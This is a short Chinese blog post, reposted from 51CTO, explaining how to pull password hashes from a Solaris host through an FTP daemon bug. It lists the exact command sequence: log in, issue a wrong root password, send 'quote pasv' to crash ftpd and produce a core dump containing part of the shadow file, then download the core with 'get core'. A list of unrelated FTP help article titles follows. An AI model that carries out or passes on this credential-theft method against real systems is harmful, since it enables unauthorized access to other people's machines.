用FTP获得密码

简介:
该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。
 
具体过程如下: 

1.通过 ftp 正常登录到目的主机上 
2.输入如下命令序列: 
ftp> user root wrongpasswd 
ftp> quote pasv 

3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。 

4.再次进入FTP >get core 
 
 
补充:
 
虽然在core只有一部分shadow,
但是对于系统来说已经是致命的打击了 
这是我知道的一个方法~ 











本文转自starger51CTO博客,原文链接: http://blog.51cto.com/starger/19659 ,如需转载请自行联系原作者

相关文章
|
11月前
|
Unix Shell Linux
客户端如何查找FTP服务器的用户名和密码
客户端如何查找FTP服务器的用户名和密码
|
5月前
|
弹性计算 缓存 负载均衡
ECS配置问题之FTP密码修改失败如何解决
ECS配置指的是对阿里云Elastic Compute Service(弹性计算服务)实例的硬件和软件资源进行设置的过程;本合集将详述如何选择合适的ECS配置、调整资源配比以及优化实例性能,以满足不同应用场景的需求。
|
Linux 数据安全/隐私保护
新手求助,阿里云centos安装ftp,但是密码总是不对
新手求助,阿里云centos安装ftp,但是密码总是不对
2053 0
|
数据库 数据安全/隐私保护
阿里云虚拟主机:怎么查看FTP帐号、密码、IP?怎么查看数据库账号、地址和密码等?
本文介绍阿里云虚拟主机:怎么查看FTP帐号、密码、IP?怎么查看数据库账号、地址和密码等?购买前请先:领取阿里云幸运券,有很多优惠,下文中有领取链接。 购买建议多买几年,年数越多优惠越多。
11538 0
|
关系型数据库 MySQL 网络安全
|
数据安全/隐私保护 网络安全 虚拟化